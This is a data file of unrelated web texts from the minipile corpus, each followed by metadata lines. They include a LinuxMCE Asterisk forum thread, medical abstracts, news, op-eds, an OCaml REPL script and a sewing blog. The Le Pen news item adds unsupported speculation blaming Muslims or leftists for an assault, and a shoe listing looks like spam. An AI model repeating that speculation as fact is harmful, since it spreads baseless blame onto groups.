However, I cannot register the line, it just says "," where it would normally say "registered <date> <time> <etc>", and I am unsure as to what this means. I can only assume it's an asterisk problem, as on previous installations I was able to register my line. How can I diagnose the problem?? hmm..since you had it working in previous installations....have you tried talk to the guys at the irc about it? perhaps its an issue with the new asterisk package they created...with the last update they said they had cooked their own asterisk-package now... The information you supplied has been put in, but unfortunately, it still says "registration failed" in the gigaset settings. I filled out name password fields using the information generated by LMCE when I added a generic SIP phone. On a slightly seperate note, the line itself is now registered in web admin "Registered, Sun, 17 Jul 2011 20:53:08", but I cannot make or receive calls using the orbiter softphones (I assume I should be able to). The warnings are nothing to be concerned with....but compare my screenshot to yours...notice the difference?I think your phones were not created properly, thats why you cannot use them. Talk to the guys on the irc, maybe they can tell you what script has to get a kickstart from you I have the same problem than Purps (last week full Lmce network install)I can not register my Siemens S675IP.But no problem for my Cisco 7970 (SCCP). Philippe Hi Philippe, I'm not convinced we are experiencing the same problem if one of your phones works; my orbiters' softphones don't even register. Which VOIP provider are you using out of interest, and what method did you use to register your line? Try adding the phone manually in web admin (as a generic SIP phone) and putting the information generated by LMCE into the Gigaset admin page (thanks to maverick0815 for this tip). I'm not convinced we are experiencing the same problem if one of your phones works; my orbiters' softphones don't even register. Which VOIP provider are you using out of interest, and what method did you use to register your line? Try adding the phone manually in web admin (as a generic SIP phone) and putting the information generated by LMCE into the Gigaset admin page (thanks to maverick0815 for this tip). Cheers,Matt. Hi Purps, It is exactly what I do.I manually add a generic SIP phone and put the informtion generated into the Gigaset.I've change the password for testing but same result. It was a different setup for the cisco 7970 (I used the wiki page for it). For my VOIP provider I use the sipgate.co.uk and modify the information to register on my french SIP provider (free.fr).Registration is ok. I've have registered my siemens gigaset on a second ip connexion directly to my SIP provider without problem.It is really the asterisk registration for the siemens that does not work correctly (it worked before the lastest big lmce .deb update on a previous install)
null
minipile
NaturalLanguage
mit
null
Abdominal wall recurrence after laparoscopic colectomy for colon cancer. Although rare, abdominal wall recurrences after laparoscopic surgery for cancer have been increasing at an alarming rate as the range and sheer number of laparoscopic surgical procedures have increased. Overall, 13 case reports of abdominal wall cancer recurrence after laparoscopic surgery have been published. We present the fourth known case of abdominal wall recurrence after laparoscopic colectomy involving a patient with a TNM stage III (T3, N2, M0) colon cancer. Recurrent cancer was located in the abdominal wall incision and also in all four port sites 9 months after surgery. These four cases have all involved patients with advanced cancers of the right side of the colon who underwent a laparoscopic-assisted right hemicolectomy. These cases of abdominal wall cancer recurrence carry ominous implications for the future of laparoscopic surgical procedures involving colorectal malignancy. Recurrent cancer in minilaparotomy incisions may simply be due to local spread of cancerous cells. However, remote port site recurrence may be due to the liberation of cancer cells throughout the abdomen from advanced colorectal cancer no longer confined to the bowel wall facilitated by intraperitoneal carbon dioxide insufflation during laparoscopy. Abdominal wall cancer recurrence is enhanced by the laparoscopic approach to colectomy for colorectal cancer. Except for controlled, clinical studies, laparoscopic colectomy for malignancy should be abandoned.
null
minipile
NaturalLanguage
mit
null
The ex-boyfriend of Sydney dentist Preethi Reddy, whose body was found in a suitcase on Tuesday, died after he deliberately drove his car into the path of a semi-trailer on Monday night, police have revealed. Dr Reddy's body was found in her car, parked in Sydney's east, after she was reported missing when she didn't return home to Penrith on Sunday. Police said she had been stabbed numerous times. The 32-year-old spoke to her family on Sunday morning about 11am, telling them she was planning on a late breakfast before heading home. Dr Reddy and her ex-boyfriend, Tamworth dentist Dr Harshwardhan Narde, had gone to a hotel in Market Street in Sydney's CBD on Saturday night.
null
minipile
NaturalLanguage
mit
null
11111 Lakeside Drive, Jonestown, Texas 78645, United States

About 11111 Lakeside Drive

A rarity!!! 3 adjacent waterfront lots located in preferred Jonestown!! Beautiful views of the Sandy Creek arm of Lake Travis. Has nice trees and level build sites!!! There is an old log cabin (green) that is deemed to have no structural value and an old storage shed. Don't miss this opportunity to build on these special lots!!

The information set forth on this site is based upon information which we consider reliable, but because it has been supplied by third parties to our franchisees (who in turn supplied it to us), we cannot represent that it is accurate or complete, and it should not be relied upon as such. The offerings are subject to errors, omissions, changes, including price, or withdrawal without notice. All dimensions are approximate and have not been verified by the selling party and cannot be verified by Kuper Sotheby's International Realty. It is recommended that you hire a professional in the business of determining dimensions, such as an appraiser, architect or civil engineer, to determine such information.
null
minipile
NaturalLanguage
mit
null
A Little Saigon businessman who trafficked counterfeit dental products and has been ordered to pay $24.1 million in restitution after losing a civil lawsuit is now facing two, related criminal charges following a grand jury indictment. According to Assistant United States Attorney Jeannie M. Joseph, Anh Tuan Luu defrauded customers as well as his former employer, Kerr Corporation, by producing and selling fake versions of that company's trademarked products for six years until 2012. After his arrest, Luu--owner of Tri Dental Innovators/Tri Dental Inc. in Garden Grove--pleaded not guilty inside Orange County's Ronald Reagan Federal Courthouse in December and is free from custody on $250,000 bail. Kerr products Luu allegedly copied included Unidose, Optibond, Revolution and Prodigy, according to the indictment. In March, the company won its $24.1 million civil judgment against Luu. U.S. Magistrate Judge Jean P. Rosenbluth ordered the defendant to surrender his U.S. Passport until the case is resolved. According to court records, Luu--who is represented by a public defender--began his alleged crime spree after Kerr terminated his employment in 2006. A Jan. 27 status conference is scheduled with Judge James V. Selna in Santa Ana.
null
minipile
NaturalLanguage
mit
null
Acute knee joint rupture--a report of two unusual cases. An acute rupture of the knee joint is a well recognized and documented condition. The symptoms and signs it produces have been described as the pseudothrombophlebitis syndrome and its importance in the differential diagnosis of calf pain is being increasingly recognized. We report two cases where the symptomatology has been unusual and stress the need for considering this condition in other atypical cases of leg pain which may not strictly conform in presentation to the pseudothrombophlebitis syndrome.
null
minipile
NaturalLanguage
mit
null
Young Chinese Children's Academic Skill Development: Identifying Child-, Family-, and School-Level Factors. This chapter addresses how child-, family-, and school-level characteristics are associated with Chinese children's academic skill development during their preschool years. Academic skills are defined in terms of young children's emergent competencies in academic domains including literacy, mathematics, and science. First, we review the relations of young Chinese children's cognition (language, visuospatial, and executive functioning), behavior (social behavior and behavioral regulation), and affect (interest and attitude) to their performance in these academic domains. Second, we review the roles of familial variables, including family socioeconomic status and broad and specific aspects of parenting practices and parental involvement. Third, we review school- and classroom-level factors, with a special emphasis on preschool and classroom quality that is particularly relevant to young Chinese children's academic skills. We discuss the educational implications of these study findings and identify methodological limitations that may threaten their internal and external validity. Our aim is to bring attention to the growing body of research on young Chinese children's academic skill development and to highlight several areas that need further research.
null
minipile
NaturalLanguage
mit
null
What’s new in ApexSQL Unit Test 2016

Create tests directly in SQL Server Management Studio
SQL Server unit tests can be created directly from Object Explorer in SSMS, using the add-in context menu.

Manage all tests with a single form
The Unit Test explorer tab allows managing unit tests. SQL Server unit tests can be created, renamed, edited, deleted or run. When the Unit Test explorer tab is open (active), use the context menu to work with a specific SQL Server unit test.

Multiple sources for installing tSQLt
The tSQLt framework can be installed from the web, from the file system, or using the built-in version of tSQLt. This allows the user to choose a specific version of the tSQLt framework or to use the built-in one included in ApexSQL Unit Test.

Organize tests in test classes

Run tests with a single click
SQL Server unit tests can be run from the Unit Test explorer tab using the context menu. The toolbar menu item performs a similar function, but only executes the SQL Server unit tests in the window that has focus. If Object Explorer and the Unit Test explorer are both open, the test selected/highlighted in whichever one has focus is the one that will be executed. In the Unit Test explorer the user can select a single test, all tests from a class, or all tests from a server in order to execute them.

Run tests directly from the Query window
SQL Server unit tests are written in a query window using standard T-SQL. Tests can be run by highlighting the test name (the stored procedure name) and selecting the Run highlighted option from the add-in toolbar in SSMS.

Run tests under one class with a single click
SQL Server unit tests from a single test class can be run directly from the Unit Test Explorer tab by selecting the class that contains the list of tests and executing all of them. Another way is to locate the class (schema) in Object Explorer, right-click the schema and choose "Run All"; this will also execute all tests under that class.

Get messages about passed and failed tests
When running tests in the Unit Test explorer tab, messages with details about failed test results are displayed.

Automated test execution
ApexSQL Unit Test can be automated via the command line interface (CLI).

Export test results when using the CLI
SQL Server unit test results can be exported in XML by using the CLI. To export test results from the CLI, it is necessary to select the path where the results should be exported and to select a test report.
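To make the above more concrete, here is a minimal sketch of the kind of tSQLt test this tooling creates and runs. The test class name (OrderTests), the table (dbo.OrderLines, with a Quantity column) and the test procedure are hypothetical examples, not part of ApexSQL Unit Test itself; the tSQLt procedures used (tSQLt.NewTestClass, tSQLt.FakeTable, tSQLt.AssertEquals, tSQLt.Run) are standard parts of the tSQLt framework.

-- Create a test class: a schema that groups related tests
EXEC tSQLt.NewTestClass 'OrderTests';
GO

-- A test is a stored procedure in that schema whose name starts with "test"
CREATE PROCEDURE OrderTests.[test total is zero when there are no order lines]
AS
BEGIN
    -- Replace the real table with an empty fake so the test is isolated from existing data
    EXEC tSQLt.FakeTable 'dbo.OrderLines';

    DECLARE @actual INT;
    SELECT @actual = COALESCE(SUM(Quantity), 0) FROM dbo.OrderLines;

    -- Compare expected and actual values; a mismatch marks the test as failed
    EXEC tSQLt.AssertEquals @Expected = 0, @Actual = @actual;
END;
GO

-- Run every test in one class (roughly what "Run All" on a schema does),
-- or all tests on the server
EXEC tSQLt.Run 'OrderTests';
-- EXEC tSQLt.RunAll;

Highlighting the procedure name in a query window and choosing Run highlighted, as described above, amounts to executing that single test through the same tSQLt machinery.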
null
minipile
NaturalLanguage
mit
null
Fox might be open to bringing the cult favorite back to life, but some things are best left in the past. No show understands better the idea of life after death than “Buffy the Vampire Slayer,” so in these heady times of reboots and revivals, it’s not exactly a shock to hear that according to Fox TV group chair Gary Newman, bringing back the show is something “we talk about frequently.” The cult favorite, which ran originally from 1997 to 2003, was groundbreaking television for its time. During its seven-season run, the drama-comedy-supernatural mishmash created by Joss Whedon represented a lot of storytelling highs, while behind the scenes, it launched the careers of a number of great writers, including “UnREAL” co-creator Marti Noxon, “Once Upon a Time” executive producer Jane Espenson, “The Martian” screenwriter Drew Goddard, and many others. Over 20 years later, “Buffy” still means a lot to its fans, and the good news for those who might be nervous about the possibility of a revival happening is that according to Newman, it would depend entirely on Whedon coming to 20th Century Fox with an idea. As reported by Variety, “Most times when we brought things back, it started with the creator coming into us and saying I’ve got another story I want to tell,” Newman said. “It seems to me that if there isn’t a real sense of nostalgia, a passionate fan base demonstrating they still want it, then I don’t really buy bringing these shows back.” As Newman said, Fox has brought back a number of its older properties lately, including “The X-Files,” “24” and “Prison Break.” The success of those revivals has been mixed, on either a creative or a ratings level, but it is nice to know that as far as Fox is concerned, Whedon would be involved. (And yes, it’s also worth noting that Whedon is technically available to take on a potential reboot, having recently exited the proposed “Batgirl” movie after a year of development.) There’s no clean answer as to where a “Buffy” revival would air: Given its cult status, it was never a ratings hit during its original run, and the two networks on which it aired — the WB and UPN — no longer exist. It is fun to remember that, technically, Buffy is now a Disney princess in the aftermath of the Fox/Disney acquisition, but that means the Fox network wouldn’t be the default home for it. And really, do we need more “Buffy”? There’s no denying the meaning that “Buffy” had for a still passionate fanbase, and the #MeToo era could always use another hero who finds as much strength in her good heart and sharp wit as she does in her superpowers. But there are too many ways this could go wrong. For one thing, a big factor is whether a new “Buffy” would be a revival, continuing the story with (potentially) original series star Sarah Michelle Gellar reprising the title role, or a pure reboot, tripping back to the original premise of “teen girl struggles with high school by day and slays vampires by night” with a whole new cast. The revival approach might be the one most palatable to fans with a fondness for the original series, though the reboot might have the most creative energy, and would free up a whole new approach to the narrative, letting Whedon update the premise for this century. Either direction seems fraught with peril, unfortunately, and ultimately not as interesting as letting Whedon, still one of TV’s most iconic showrunners, develop a fresh new idea. That’s ultimately what we’ll keep our fingers crossed for. Sign Up: Stay on top of the latest breaking film and TV news! 
null
minipile
NaturalLanguage
mit
null
Pulmonary intravascular macrophages in deer. Pulmonary intravascular macrophages (PIMs) have been found in the septal capillaries of deer lungs. Lung samples from adult deer were fixed in 2.5% glutaraldehyde, and then routinely processed for electron microscopy. The main features of the PIMs were the presence of tubular invaginations in the membrane (micropinocytosis vermiformis), phagosomes, and junctions with endothelial cells. A mean of 4.4 of these junctions was recorded per cell. They comprised segments ranging from 67 to 289 nm in length, where the plasma membranes were separated by spaces from 10 to 25 nm wide. In these areas the cytoplasm underlying the membranes showed evidence of increased electron density. When PIMs were compared with alveolar macrophages, it could be seen that although the PIMs were more numerous (more than twice), they were also smaller than the alveolar macrophages (47.625 versus 101.260 µm², respectively).
null
minipile
NaturalLanguage
mit
null
Cnoc Raithní Cnoc Raithní (, "hill of bracken") is a tumulus (burial mound) and National Monument located on Inisheer, Ireland. Location Cnoc Raithní is located on the northern edge of Inisheer, overlooking the harbour. History The lower tier is dated to c. 2000–1500 BC, making this the earliest known settlement site on the island. The upper part is believed to be Early Christian (5th to 8th centuries AD). The site was covered by sands before being exposed by a storm in 1885; in that year, it was excavated by D. Murphy and cordoned cinerary urns with cremated bones and a bronze awl were found. Description A circular sandy mound revetted by a drystone wall. About 27 slab-lined graves protrude above the south half. The north half is occupied by a kerbed platform with two limestone pillars. References Category:Archaeological sites in County Galway Category:National Monuments in County Galway Category:Buildings and structures completed in the 2nd millennium BC Category:Tumuli in Ireland Category:Aran Islands
null
minipile
NaturalLanguage
mit
null
#use "topfind";; #require "compiler-libs";; #require "unix";; (*#require "reason";;*) #load "ocamlcommon.cma";; #load "unix.cma";; (*#load "reason.cma";;*) type syntax = Reason | OCaml type eval_result = Success | Error of string type mode = | RunCode of string * syntax | StartRepl of syntax | PrintExpression of string * syntax | Stdin of syntax | Invalid of string type args = {mode: mode} exception LangException of string let _ = let interactive_mode = ref false in let eval_filepath = ref None in let quiet = ref false in let syntax = ref OCaml in let print_mode = ref false in let run_mode = ref false in let ps1 = Sys.getenv_opt "PRYBAR_PS1" |> function | Some str -> str | None -> "#" in let ps2 = Sys.getenv_opt "PRYBAR_PS2" |> function | Some str -> str | None -> " " in (* If there is code provided to interpret *) let code = ref "" in let parse_syntax = function | "re" -> syntax := Reason | "ml" -> syntax := OCaml | arg -> raise (Arg.Bad ("Unknown syntax: " ^ arg)) in let print_mode_arg str = print_mode := true ; code := str in let run_mode_arg str = run_mode := true ; code := str in let speclist = [ ("-q", Arg.Set quiet, "Don't print OCaml version on startup") ; ( "-e" , Arg.String print_mode_arg , "Eval and output results of interpreted code" ) ; ("-c", Arg.String run_mode_arg, "Run code without printing the output") ; ("-i", Arg.Set interactive_mode, "Run as interactive repl") ; ( "-s" , Arg.Symbol (["ml"; "re"], parse_syntax), " Sets the syntax for the repl (default: ml)" ) ] in let usage_msg = "OCaml / Reason repl script for prybar. Options available:" in Arg.parse speclist (fun str -> match (str, !interactive_mode) with | (path, true) -> eval_filepath := Some(path) | _ -> print_endline ("Anonymous arg: " ^ str) ) usage_msg ; let mode = match (!print_mode, !run_mode, !interactive_mode) with | true, false, false -> PrintExpression (!code, !syntax) | false, true, false -> RunCode (!code, !syntax) | false, false, true -> StartRepl !syntax | _ -> Invalid "You can only use one mode: -e | -i | -c" in let module Custom_Toploop = struct include Toploop open Format (* Most stuff is straightly copied and modified * from github.com/ocaml/ocaml/blob/trunk/toplevel/toploop.ml *) exception PPerror let first_line = ref true let got_eof = ref false let refill_lexbuf buffer len = if !got_eof then ( got_eof := false ; 0 ) else let prompt = if !first_line then ps1 ^ " " else if Lexer.in_comment () then "* " else ps2 (* continuation prompt *) in first_line := false ; let len, eof = !read_interactive_input prompt buffer len in if eof then ( Location.echo_eof () ; if len > 0 then got_eof := true ; len ) else len (* Minimal version of just running any input file, we stripped a lot of original logic * because we don't want to do any side effects on the compiler environment *) let run_script ppf name = let explicit_name = (* Prevent use_silently from searching in the path. 
*) if name <> "" && Filename.is_implicit name then Filename.concat Filename.current_dir_name name else name in use_silently ppf explicit_name let loop ppf = Clflags.debug := true ; Location.formatter_for_warnings := ppf ; ( try initialize_toplevel_env () with | (Env.Error _ | Typetexp.Error _) as exn -> Location.report_exception ppf exn ; exit 2 ) ; let lb = Lexing.from_function refill_lexbuf in Location.init lb "//toplevel//" ; Location.input_name := "//toplevel//" ; Location.input_lexbuf := Some lb ; Sys.catch_break true ; (*load_ocamlinit ppf;*) (* If there's an entry file provided, run it before dropping into interactive mode *) (match !eval_filepath with | Some name -> run_script ppf name | _ -> false) |> ignore ; while true do let snap = Btype.snapshot () in try Lexing.flush_input lb ; Location.reset () ; Warnings.reset_fatal () ; first_line := true ; let phr = try !parse_toplevel_phrase lb with Exit -> raise PPerror in let phr = preprocess_phrase ppf phr in Env.reset_cache_toplevel () ; ignore (execute_phrase true ppf phr) with | End_of_file -> exit 0 | Sys.Break -> fprintf ppf "Interrupted.@." ; Btype.backtrack snap | PPerror -> () | x -> Location.report_exception ppf x ; Btype.backtrack snap done end in let module Repl = struct let std_fmt = Format.std_formatter let noop_fmt = Format.make_formatter (fun _ _ _ -> ()) ignore let init_toploop () = Topfind.add_predicates ["byte"; "toploop"] ; (* Add findlib path so Topfind is available and it won't be initialized twice if the user does [#use "topfind"]. *) Topdirs.dir_directory (Findlib.package_directory "findlib") ; Toploop.initialize_toplevel_env () let start_loop ?(fmt = std_fmt) () = Custom_Toploop.loop fmt let eval ?(fmt = std_fmt) ~syntax str = try let lex = Lexing.from_string str in let tpl_phrases = match syntax with | OCaml | Reason -> Parse.use_file lex (*| Reason ->*) (*List.map Reason_toolchain.To_current.copy_toplevel_phrase*) (*(Reason_toolchain.RE.use_file lex)*) in let exec phr = if Toploop.execute_phrase true fmt phr then Success else Error "No result" in let rec execAll phrases = match phrases with | [] -> Error "No result" | [phr] -> exec phr | phr :: next -> ( let ret = exec phr in match ret with Error _ -> ret | _ -> execAll next ) in execAll tpl_phrases with | Syntaxerr.Error _ -> Error "Syntax Error occurred" (*| Reason_syntax_util.Error _ -> Error "Reason Parsing Error"*) | _ -> Error ("Error while exec: " ^ str) end in if not !quiet then print_endline ("OCaml " ^ Sys.ocaml_version ^ " on " ^ Sys.os_type); match mode with | PrintExpression (code, syntax) -> Repl.init_toploop () ; Repl.eval ~syntax code |> ignore | RunCode (code, syntax) -> Repl.init_toploop () ; Repl.eval ~syntax ~fmt:Repl.noop_fmt code |> ignore | StartRepl syntax -> Repl.init_toploop () ; Repl.start_loop () | Stdin syntax -> print_endline "Reading from stdin" | Invalid str -> print_endline str
null
minipile
NaturalLanguage
mit
null
U.N. Secretary General urges more aid for people of Mosul

New York, United States (Reuters): United Nations Secretary General Antonio Guterres on Friday called on the international community to increase aid to help people fleeing the Iraqi city of Mosul, which government forces have been battling to retake from Islamic State. Iraqi forces have seized back most of the country's second-largest city from the Sunni hardline group in a massive six-month campaign. But at least 355,000 residents have fled fighting, according to the government, and some 400,000 civilians remain trapped inside the densely-populated Old City where street battles have raged for weeks. "We don't have the resources necessary to support these people," Guterres told reporters during a visit to the Hassan Sham Camp, one of several centers outside Mosul packed with civilians escaping the fighting. The U.N. and Iraqi authorities have been building more camps but struggle to accommodate new arrivals, with two families sometimes having to share one tent. "Unfortunately our program is only 8 percent funded," he said, referring to a 2017 U.N. humanitarian response program without giving additional details. Iraqi forces have won back control of most cities that fell to the group and the militants have been dislodged from nearly three quarters of Mosul but remain in control of its center. Government positions have reached as close as 500 meters to the al-Nuri Mosque, from where Islamic State leader Abu Bakr al-Baghdadi declared a caliphate spanning parts of Iraq and Syria in July 2014. Baghdadi and other IS leaders are believed to have left the city but U.S. officials estimate around 2,000 fighters remain inside the city, resisting with snipers hiding among the population, car bombs and suicide trucks targeting Iraqi positions.
null
minipile
NaturalLanguage
mit
null
The attack took place at the exit of a bowling alley at Nelson Mandela Square on Thursday night while she and her 18-year-old cousin were leaving. Two men aged 32 and 47 from Nanterre approached the two and physically assaulted them at around 2 am, hitting Le Pen’s daughter in the head, Le Parisien reports.

Breitbart

The two are now in police custody. But no information on their motives has been communicated by the authorities. It is not known if they were aware of whom they assaulted, or if they acted at random. (It is possible that, because Marine Le Pen is a recent right-wing presidential candidate and leader of the anti-Islamization Front National party, her daughter was targeted either by opposition-party leftists or by Muslims looking for revenge on her mother.) Investigators have so far not commented on the cause of the attack, but the cousin of Ms Le Pen’s daughter has filed charges with police against the two men. The incident provoked outrage from the former French presidential candidate, who called the attack a “gratuitous aggression,” and added: “there was no fight … there was an assault, a gratuitous assault on two young people aged 18 and 19.” “But this is not inevitable. This is, I believe, the consequence of political choices that have been made for a number of years,” she continued, saying her daughter was in a state of shock about the attack but that she was relieved the incident was not more serious.

France24

Le Pen’s party name, Front National, was changed to “Rassemblement national” — which can be translated as National Rally or National Gathering – and is designed to facilitate political alliances with like-minded factions.
null
minipile
NaturalLanguage
mit
null
About Whether it’s cleaning up dust and debris from a new construction site, deep cleaning an apartment after a move-out, or getting your new home in pristine condition for a move in, these jobs are totally different than hiring a housekeeper for your home. To do it right usually requires going over surfaces and corners multiple times to ensure that every piece of dust is gone. Our specialists are trained to make sure every crevice is spotless. We specialize in new/post construction clean ups, development projects, and move in/move out detail jobs. For corporate apartment rentals for relocation teams, we also manage the constant maintenance, turnover, inventory and seasonal cleaning. Our services include preparing apartments for staging, where we do a complete overhaul of the home prior to putting the home on the market. Rest easy, we are insured and bonded.
null
minipile
NaturalLanguage
mit
null
Currently working on the project are "more than a hundred great people who work without pay in exchange for shares in the company." As stated, many of them have their own jobs and businesses, but they devote dozens of hours a week to HTT. First would be a working network in the US, which should link all major US cities, and then the project would move to Europe, Africa and Asia. HTT has announced that the project needs between seven and 19 billion dollars, and CEO Dirk Alborn said that such a broad estimate is required due to unforeseen material prices and costs over a period of ten years. HTT operates under the company's fundraising platform JumpStartFund, of which Alborn is president, and apparently there are already many donors and investors who want to invest money. Alborn acknowledged that the ten-year plan may be ambitious, because it does not take into account the regulation of the legal framework and the "political problems".

-We want to be transparent. For us, the first goal is to build the "Hyperloop"; we want to see it in the United States, and if it made more sense to do it in another territory, it will be so. The goal is to build it. The second goal is to make it cost effective. We have an idea that there could be luxury capsules, but economy class travel would cost 20-30 US dollars. Ideally, the ordinary fare would be free, and paid for by commercials - says Alborn.

Capsules should float at nearly supersonic speeds from point A to point B on a cushion of air, which would eliminate friction - like a puck on an air hockey table. The capsules would be kept under pressure, and under this project, travelers during the trip would feel a slightly stronger force, as during take-off or landing, or a ride in an amusement park.

-Until someone invents the right beam, which would really be cool, the only way for a super-fast journey is through a pipe in which there are special conditions - said Musk at the time.

Wednesday, 3 December 2014

Did you know that the air we breathe isn't just oxygen? In fact it's made up of a number of different gases such as nitrogen, oxygen, carbon dioxide, argon, neon and many others. Each of these gases carries useful properties, so separating them from the air around us is extremely beneficial. The process is called fractional distillation and consists of two steps: the first relies on cooling the air to a very low temperature (i.e. converting it into a liquid); the second involves heating it up, thus allowing each gas within the mixture to evaporate at its own boiling point. The key to success here is that every element within air has its own unique boiling temperature. As long as we know these boiling temperatures we know when to collect each gas. So what are the real-world benefits of separating and extracting these gases? Well, liquid oxygen is used to power rockets, oxygen gas is used in breathing apparatus, nitrogen is used to make fertilizers, and nitric acid made using nitrogen is used in explosives. The other gases all have their own uses too; for example, argon is used to fill up the empty space in most light bulbs (thanks to its unreactive nature). Carbon dioxide is used in fire extinguishers and is great for putting out fires in burning liquids and electrical fires. There really are too many uses to list, but suffice it to say that fractional distillation is an extremely useful process for humans the world over.

Monday, 1 December 2014

There's really a more productive way to spend Black Friday instead of going berserk and storming the stores. A really huge crowd of 90,000 people, capable of invading every bigger mall during yesterday's run-and-buy frenzy, has made history by sending greetings to our reddish neighboring planet.
“Today uwingu.com sent almost 90,000 messages to Mars—first time people’s names & messages sent to Mars by radio!” the Uwingu company, which crowd-funds space projects, said on Twitter. It was a global shout-out event to mark the 50th anniversary of NASA’s Mariner 4 - the first mission to Mars.
null
minipile
NaturalLanguage
mit
null
Multi-partisan thinking needed in White House

August 28, 2008
Written by REUBEN MEES

Over the past nine months, Sen. Barack Obama has repeatedly made two promises to the American public — change and unity. With the Democratic primary looming close and his nomination as the party’s candidate sealed, it is time for him to start living up to those promises by announcing the person he will have as his vice-presidential candidate. It’s becoming clear to a lot of people that Sen. Hillary Clinton — a remnant of her husband’s era that interrupted the Bush administrations — does not represent the kind of change Americans want. And having two Democratic senators on the ticket would not represent any real diversity in political ideology, although gender and race would be well reflected. But whenever I think about change and unity, I always veer away from the two main parties and find myself siding with some little known third party candidate or independent with little to no name recognition. So who should Obama pick? My first choice would be to ask Ron Paul. Although he has borne an R behind his name in past elections, he has demonstrated an ability to draw supporters from both parties disenfranchised with the stagnant policies of the past — not to mention his ability to gather campaign cash on a grassroots level. What better way to offer the laurel of unity than to extend an invitation to the vice-presidency to a member of the opposite party? The big asterisk being that he is far afield of modern mainstream Republican ideals. Of course, his philosophy of retreating from world affairs may be even further afield from Obama’s more liberal agenda, which brings me to my second suggestion. Ralph Nader. The avid consumer advocate is already interjecting his voice in the race, criticizing the mainstream candidates for their inability to make definitive statements or take a solid stance on pretty much any issue they are questioned about. Nader, although he has lost credibility as a serious candidate since the 2000 election, does represent the position of many U.S. citizens as they become ever more aware of green energy, huge corporate conglomerates dictating the lives of Americans or the war in Iraq and other foreign policy issues. I guess the next question is: Would either of these guys consider it if offered? And unfortunately, the answer is probably no. Although they each espouse alternative political views that would be beneficial in significant policymaking decisions that affect our country, I’m sure they would have some excuse for opting out. Whether it be some particular social or economic issues the two men would invariably butt heads over or merely the fact that their egos would not allow them to take a back seat to someone else they may not agree with entirely. Or maybe the conspiracy theorists who claim Nader only gets in presidential races to divert Democratic votes and seal Republican victories are right. If they were wise and truly wanted the change they talk about, however, they would look at it as an opportunity to open the door to the ideas they represent on a national level. And then, the Obama ticket could claim more than lip service to making our multi-partisan nation a progressive one dedicated to change and unity.
null
minipile
NaturalLanguage
mit
null
Q: Virus replicating through signals to civilizations I've read a story once. So, people have received a signal from space and it turned out that the signal was some kind of scheme or something, and when they built that thing, it captured the Earth and started sending the same signal to space. Looked like something like a self-replicating virus in space. Does anyone remember who is the author of this novel? I'm not quite sure about details but the main idea was about virus replicating through information transimission. It may be authored by Isaac Asimov, but I can't find such a story from him. A: This is actually a pretty common trope in sci-fi. There's a couple of the more obvious books that immediately spring to mind; 1) A for Andromeda by Fred Hoyle. A new radio telescope picks up from the constellation of Andromeda a complex series of signals which prove to be a programme for a giant computer. After the computer is built it begins to relay information from Andromeda. Scientists find themselves possessing knowledge previously unknown to mankind, knowledge that could threaten the security of human life itself. 2) His Master's Voice by Stanislaw Lem; Twenty-five hundred scientists have been herded into an isolated site in the Nevada desert. A neutrino message of extraterrestrial origin has been received and the scientists, under the surveillance of the Pentagon, labor on His Master's Voice, the secret program set up to decipher the transmission. Among them is Peter Hogarth. When he discovers that the TX Effect could lead to the construction of a fission bomb, Hogarth decides such knowledge must not be allowed to fall into the hands of the military. A: Existence by David Brin matches what you're looking for. Civilizations build themselves into ruin after finding artifacts from space, and transmit more of the same artifacts that then infect other civilizations.
null
minipile
NaturalLanguage
mit
null
Latest Geox Shahira Trainers Blue for Women Sale Online

£142.64 £85.43

Product Description
Both trendy and sporty, these Geox low top trainers are an essential item. Comfortable and stylish, they have an upper and they come in a great blue colour. The Shahira is made with a synthetic sole and a fabric lining. So, what do you think?

Model: Cheap 011
595 Units in Stock

This product was added to our catalog on Thursday 17 November, 2016.
null
minipile
NaturalLanguage
mit
null
Do you ever shy away from sewing fashions, since getting the right fit may seem daunting? Don’t worry—you’re not alone. During the next two Sewing With Nancy episodes featuring the new show, Solving the Pattern Fitting Puzzle, I’d like to share with you my favorite pattern fitting techniques that are easily mastered without cutting the original pattern pieces apart! The random winner of a copy of the book, Sew Gifts—Make Memories by Mary Mulari, is Nadine Nakano, who shared, “I have a huge box of old jeans that I want to upcycle so I’ll use a lot of it for the holidays as gifts”. Don’t forget to submit your holiday stocking in my Stocking Challenge! The deadline to enter is MONDAY, December 7, 2015. Click here to see how to enter. Make sure you are subscribed to my enews mailing list so you won’t miss a thing. Sign up here. Related Posts 99 Comments I just received my book “Pattern Fitting with Confidence” by Nancy Zieman. I have also acquired a pattern from Seamwork which obviously is not sized as McCall’s and Simplicity. How do I determine which size to use? Here is a link to their sizing charts: https://help.colettemedia.com/patterns/size-charts Nancy ZiemanAugust 6, 2016 Lana, I don’t know the answer as I have not worked with Seamwork. Perhaps you could contact them to see how their sizing correlates with the standard McCall’s and SImplicity sizing. SharonApril 9, 2016 I have used this method for many years, since Nancy introduced it. Love it, and find it works well for me. MrlanieApril 9, 2016 I am petite and struggle with making tops that fit across my shoulders without gaping at the top, mid back while maintaining the correct bust size. Would love tips! DebraApril 9, 2016 As always, great tips! I have been a fan of your pivot and slide method since the 1980′s when I ordered your project sheets. It has been my go to method for fitting in garment construction ever since. Linda WJanuary 17, 2016 I used my “right size measurement” for a shirt I’m making pinned it together & it actually looks like it fits. I also found a great way to duplicate pattern pieces purchase table cloths made with dunicel (Berkeley Jensen) makes them 50″x108″ (127cm x 274.32cm) they come 2 in a package. Acts like fabric much easier to handle than tissue paper. Happy Sewing GraceJanuary 16, 2016 Thank you so much for these programs about pattern alterations! I learned a great deal from the book you published in the 1980s, and it’s great to have a refresher and some updated techniques. My problem adjustment is altering for very plus sized women (I build costumes for community theatre), particularly modifying for DD+ busts while keeping the shoulder/armhole from being too large on standard and princess bodices. I would also like to know how to draft a trouser pattern for a protruding bottom, without making the trouser leg far too wide. Thank you! Linda WNovember 24, 2015 I measured across arm to arm crease got 14.5″ which puts me @ a misses pattern size 16. The clerk at Joann Fabrics told me I needed a woman’s size so I cut out a woman’s size 24 pattern for my pants (they’re HUGE) I understand adding the difference in measurement to each side but how do I adjust the crotch seams Patsy DobbsNovember 24, 2015 My bust is smaller than it should be to be in proportion with my waist. Also waist not in proportion to hips.Then there is the problem tummy now that I’m 81, which doesn’t help. 
